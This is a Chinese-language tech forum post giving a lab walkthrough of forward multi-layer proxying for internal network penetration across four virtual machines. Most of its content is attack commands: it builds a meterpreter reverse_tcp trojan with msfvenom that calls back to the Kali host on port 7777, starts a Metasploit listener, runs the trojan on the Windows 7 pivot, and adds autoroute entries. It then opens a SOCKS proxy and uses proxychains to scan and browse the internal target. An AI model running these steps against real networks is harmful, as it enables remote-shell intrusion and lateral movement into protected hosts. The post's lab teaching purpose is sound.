电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 74 人浏览分享

正向多层代理(内网渗透)

[复制链接]
74 0
一些前缀准备

1、需要四台虚拟机---win10(作为本地主机)、kali(作为vps)、win7(作为跳板)、win2012(作为目标机)

2、我们需要模拟内网主机,需要配置一下虚拟机网卡,让他不出网

编辑---->虚拟网络编辑器---->添加网络

QQ截图20221207150256.png

DHCP设置

这里的范围随意

200.png

3、所有的主机都使用NAT模式

4、跳板机需要两张网卡(一张出网(NAT)、一张当内网(12.12.12.0网段的))

199.png

5、目标机使用小皮面板开个http服务

198.png

搭建隧道代理

win7是代理,访问kali自己的1080相当于让win7帮我们访问目标机的80端口

kali生成木马用于连接跳板机win7

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.250.129 LPOR
T=7777 -f exe > kali.exe

189.png

kali开启监听

msfconsole
set payload windows/meterpreter/reverse_tcp
set lhost eth0
set lport 7777
run

188.png

上线木马

将木马放到win7中运行

186.png

配置win7的路由

保证win7能通win2012

run autoroute -p
run autoroute -s 12.12.12.0/24
run autoroute -p
bg
route print

185.png

183.png

kali开启隧道

use auxiliary/server/socks_proxy
set version 4a
run

182.png

vim /etc/proxychains4.conf

socks4 192.168.250.129 1080

181.png

kali访问目标机

proxychains nmap -sT 12.12.12.18 -p 80   或者

proxychains firefox 12.12.12.18

如果浏览器访问不了,那能探测到80端口的开放就可以了

180.png

通过win10访问目标主机

开启全局代理让所有流量指向kali机

下载SocksCap(下载exe就好)

https://github.com/bobo2334/sockscap64/releases

安装时遇到这个选否

169.png

运行exe

168.png

166.png

165.png

100.png

89.png

88.png

本地使用burp抓包

抓包配置

86.png

完成

9.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.